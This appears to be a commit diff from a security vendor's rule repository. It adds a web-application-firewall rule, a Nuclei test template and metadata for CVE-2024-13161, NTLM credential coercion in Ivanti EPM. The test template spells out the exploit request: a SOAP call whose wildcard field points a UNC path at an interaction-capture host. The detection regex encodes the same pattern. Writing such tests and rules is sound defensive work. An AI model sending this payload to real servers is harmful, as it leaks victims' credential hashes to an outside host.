Add CVE-2024-13161 rule and test

.appsec-tests/CVE-2024-13161/CVE-2024-13161.yaml

@@ -0,0 +1,30 @@
+## autogenerated on 2025-03-13 18:21:48
+id: CVE-2024-13161
+info:
+  name: CVE-2024-13161
+  author: crowdsec
+  severity: info
+  description: CVE-2024-13161 testing
+  tags: appsec-testing
+http:
+  - raw:
+      - |
+        POST /WSVulnerabilityCore/VulCore.asmx HTTP/1.1
+        Host: {{Hostname}}
+        Accept: */*
+        Content-Type: text/xml
+        Soapaction: http://tempuri.org/GetHashForSingleFile
+
+        <?xml version="1.0" encoding="utf-8"?>
+        <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
+            <soap:Body>
+                <GetHashForSingleFile xmlns="http://tempuri.org/">
+                    <wildcard>\\{{interactsh-url}}\tmp\{{file}}.txt</wildcard>
+                </GetHashForSingleFile>
+            </soap:Body>
+        </soap:Envelope>
+    cookie-reuse: true
+    matchers:
+    - type: status
+      status:
+       - 403

.appsec-tests/CVE-2024-13161/config.yaml

@@ -0,0 +1,4 @@
+## autogenerated on 2025-03-13 18:21:48
+appsec-rules:
+  - ./appsec-rules/crowdsecurity/CVE-2024-13161.yaml
+nuclei_template: CVE-2024-13161.yaml

.index.json

@@ -82,6 +82,32 @@
   }
  },
  "appsec-rules": {
+  "crowdsecurity/CVE-2024-13161": {
+   "path": "appsec-rules/crowdsecurity/CVE-2024-13161.yaml",
+   "version": "0.1",
+   "versions": {
+    "0.1": {
+     "digest": "e0e0fef36d175cd395b7e7949db765a9dbedd432b8f82235fbd5b2df2ea5353c",
+     "deprecated": false
+    }
+   },
+   "content": "IyMgYXV0b2dlbmVyYXRlZCBvbiAyMDI1LTAzLTEzIDE4OjIxOjQ4Cm5hbWU6IGNyb3dkc2VjdXJpdHkvQ1ZFLTIwMjQtMTMxNjEKZGVzY3JpcHRpb246ICdEZXRlY3RzIE5UTE0gY3JlZGVudGlhbCBjb2VyY2lvbiB2aWEgdGhlIEdldEhhc2hGb3JTaW5nbGVGaWxlIGVuZHBvaW50IGluIEl2YW50aSBFUE0nCnJ1bGVzOgogIC0gYW5kOgogICAgICAtIHpvbmVzOgogICAgICAgICAgLSBVUkkKICAgICAgICB0cmFuc2Zvcm06CiAgICAgICAgICAtIGxvd2VyY2FzZQogICAgICAgIG1hdGNoOgogICAgICAgICAgdHlwZTogZXF1YWxzCiAgICAgICAgICB2YWx1ZTogL3dzdnVsbmVyYWJpbGl0eWNvcmUvdnVsY29yZS5hc214CiAgICAgIC0gem9uZXM6CiAgICAgICAgICAtIEJPRFkKICAgICAgICB0cmFuc2Zvcm06CiAgICAgICAgICAtIGxvd2VyY2FzZQogICAgICAgIG1hdGNoOgogICAgICAgICAgdHlwZTogcmVnZXgKICAgICAgICAgIHZhbHVlOiAnPHdpbGRjYXJkPlxcXFwuKlxcdG1wXFwuKlwudHh0PFwvd2lsZGNhcmQ+JwpsYWJlbHM6CiAgdHlwZTogZXhwbG9pdAogIHNlcnZpY2U6IGh0dHAKICBjb25maWRlbmNlOiAzCiAgc3Bvb2ZhYmxlOiAwCiAgYmVoYXZpb3I6ICdodHRwOmV4cGxvaXQnCiAgbGFiZWw6ICdJdmFudGkgRVBNIENyZWRlbnRpYWwgQ29lcmNpb24nCiAgY2xhc3NpZmljYXRpb246CiAgICAtIGN2ZS5DVkUtMjAyNC0xMzE2MQogICAgLSBhdHRhY2suVDEyMTAKICAgIC0gY3dlLkNXRS0zNg==",
+   "description": "Detects NTLM credential coercion via the GetHashForSingleFile endpoint in Ivanti EPM",
+   "author": "crowdsecurity",
+   "labels": {
+    "behavior": "http:exploit",
+    "classification": [
+     "cve.CVE-2024-13161",
+     "attack.T1210",
+     "cwe.CWE-36"
+    ],
+    "confidence": 3,
+    "label": "Ivanti EPM Credential Coercion",
+    "service": "http",
+    "spoofable": 0,
+    "type": "exploit"
+   }
+  },
   "crowdsecurity/base-config": {
    "path": "appsec-rules/crowdsecurity/base-config.yaml",
    "version": "0.1",

appsec-rules/crowdsecurity/CVE-2024-13161.yaml

@@ -0,0 +1,30 @@
+## autogenerated on 2025-03-13 18:21:48
+name: crowdsecurity/CVE-2024-13161
+description: 'Detects NTLM credential coercion via the GetHashForSingleFile endpoint in Ivanti EPM'
+rules:
+  - and:
+      - zones:
+          - URI
+        transform:
+          - lowercase
+        match:
+          type: equals
+          value: /wsvulnerabilitycore/vulcore.asmx
+      - zones:
+          - BODY
+        transform:
+          - lowercase
+        match:
+          type: regex
+          value: '<wildcard>\\\\.*\\tmp\\.*\.txt<\/wildcard>'
+labels:
+  type: exploit
+  service: http
+  confidence: 3
+  spoofable: 0
+  behavior: 'http:exploit'
+  label: 'Ivanti EPM Credential Coercion'
+  classification:
+    - cve.CVE-2024-13161
+    - attack.T1210
+    - cwe.CWE-36

collections/crowdsecurity/appsec-virtual-patching.yaml

@@ -81,6 +81,7 @@ appsec-rules:
 - crowdsecurity/vpatch-CVE-2024-51378
 - crowdsecurity/vpatch-CVE-2024-41713
 - crowdsecurity/vpatch-CVE-2024-6205
+- crowdsecurity/CVE-2024-13161.yaml
 author: crowdsecurity
 contexts:
 - crowdsecurity/appsec_base

taxonomy/scenarios.json

@@ -1,4 +1,26 @@
 {
+  "crowdsecurity/CVE-2024-13161": {
+    "name": "crowdsecurity/CVE-2024-13161",
+    "description": "Detects NTLM credential coercion via the GetHashForSingleFile endpoint in Ivanti EPM",
+    "label": "Ivanti EPM Credential Coercion",
+    "behaviors": [
+      "http:exploit"
+    ],
+    "mitre_attacks": [
+      "TA0008:T1210"
+    ],
+    "confidence": 3,
+    "spoofable": 0,
+    "cti": true,
+    "service": "http",
+    "created_at": "2025-03-13 18:21:51",
+    "cves": [
+      "CVE-2024-13161"
+    ],
+    "cwes": [
+      "CWE-36"
+    ]
+  },
   "crowdsecurity/generic-freemarker-ssti": {
     "name": "crowdsecurity/generic-freemarker-ssti",
     "description": "Generic FreeMarker SSTI",